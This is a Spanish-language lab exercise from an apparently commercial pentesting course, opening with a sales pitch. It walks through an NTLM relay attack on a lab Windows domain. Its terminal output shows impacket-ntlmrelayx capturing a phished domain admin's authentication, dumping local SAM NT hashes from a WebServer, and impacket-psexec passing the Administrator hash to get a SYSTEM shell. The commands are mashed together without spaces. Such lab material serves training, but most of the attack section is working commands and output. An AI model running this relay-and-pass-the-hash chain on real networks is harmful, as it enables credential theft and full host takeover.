Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!
OBJETIVO DEL EJERCICIO #14:
Utilizaimpacket-ntlmrelayxpara exponer servicios maliciosos con el objetivo de capturar los hashes de WebServer. Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.
impacket-ntlmrelayx es una herramienta del conjunto de herramientas Impacket, desarrollada por Fortra (anteriormente conocida como SecureAuth). Esta herramienta se utiliza para realizar ataques de retransmisión NTLM, una técnica que aprovecha la forma en que el protocolo NTLM (NT LAN Manager) maneja la autenticación en redes Windows
Para este ataque es necesario tener un VPC con IP Publica y desde alli configurar el responder.
┌──(root㉿kali)-[/home/kali]└─#ipashow1:lo:<LOOPBACK,UP,LOWER_UP>mtu65536qdiscnoqueuestateUNKNOWNgroupdefaultqlen1000link/loopback00:00:00:00:00:00brd00:00:00:00:00:00inet127.0.0.1/8scopehostlovalid_lftforeverpreferred_lftforeverinet6::1/128scopehostvalid_lftforeverpreferred_lftforever2:eth0:<BROADCAST,MULTICAST,UP,LOWER_UP>mtu9001qdiscmqstateUPgroupdefaultqlen1000link/ether02:01:36:bf:4e:abbrdff:ff:ff:ff:ff:ffinet10.0.1.174/24brd10.0.1.255scopeglobaldynamiceth0valid_lft3498secpreferred_lft3498secinet6fe80::1:36ff:febf:4eab/64scopelinkvalid_lftforeverpreferred_lftforever┌──(root㉿kali)-[/home/kali]└─#impacket-ntlmrelayx--no-http-server-smb2support-tsmb://10.0.1.249Impacketv0.11.0-Copyright2023Fortra[*] Protocol Client DCSYNC loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client IMAP loaded..[*] Protocol Client IMAPS loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client MSSQL loaded..[*] Protocol Client SMB loaded..[*] Protocol Client RPC loaded..[*] Running in relay mode to single host[*] Setting up SMB Server[*] Setting up WCF Server[*] Setting up RAW Server on port 6666[*] Servers started, waiting for connections
Para este escenario estaremos apuntando hacia la IP 10.0.1.249 que corresponde a WebServer.
Te recomiendo revisar por medio de un escaneo de SMB este activo tecnologico.
Y ahora desde RDP en el servidor First-DC con la IP 10.0.1.100 vamos a simular que somos la victima.
En la evidencia previa, se puede apreciar un phising que trata de seducir al administrador de dominio a revisar el SMB de la IP del atacante: 10.0.1.174
Si la victima accediendo al recurso compartido malicioso, le saldra esto:
Y en nuestro impacket-ntlmrelayx, vamos a obtener lo siguiente:
[*] Servers started, waiting for connections[*] SMBD-Thread-4 (process_request_thread):Received connection from 10.0.1.100, attacking target smb://10.0.1.249[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMINSUCCEED[*] SMBD-Thread-6 (process_request_thread):Connection from 10.0.1.100 controlled, but there are no more targets left![*] SMBD-Thread-7 (process_request_thread):Connection from 10.0.1.100 controlled, but there are no more targets left![*] ServiceRemoteRegistry is in stopped state[*] Starting service RemoteRegistry[*] Targetsystem bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::[*] Done dumping SAM hashes for host: 10.0.1.249[*] Stopping service RemoteRegistry
┌──(root㉿kali)-[/home/kali]└─#impacket-psexec-hashes:f47f6266f4bb428db65cd949e7537f52Administrator@10.0.1.249Impacketv0.11.0-Copyright2023Fortra[*] Requesting shares on 10.0.1.249.....[*] Found writable share ADMIN$[*] Uploading file iHpDtPof.exe[*] Opening SVCManager on 10.0.1.249.....[*] Creating service yVzM on 10.0.1.249.....[*] Starting service yVzM.....[!] Press help for extra shell commandsMicrosoftWindows [Version 10.0.20348.1006](c) MicrosoftCorporation.Allrightsreserved.C:\Windows\system32> whoamintauthority\systemC:\Windows\system32> hostnameWebServerC:\Windows\system32> ipconfigWindowsIPConfigurationEthernetadapterEthernet2:Connection-specificDNSSuffix.:spartancybersec.corpLink-localIPv6Address.....:fe80::3dce:ac79:a1b0:7820%7IPv4Address...........:10.0.1.249SubnetMask...........:255.255.255.0DefaultGateway.........:10.0.1.1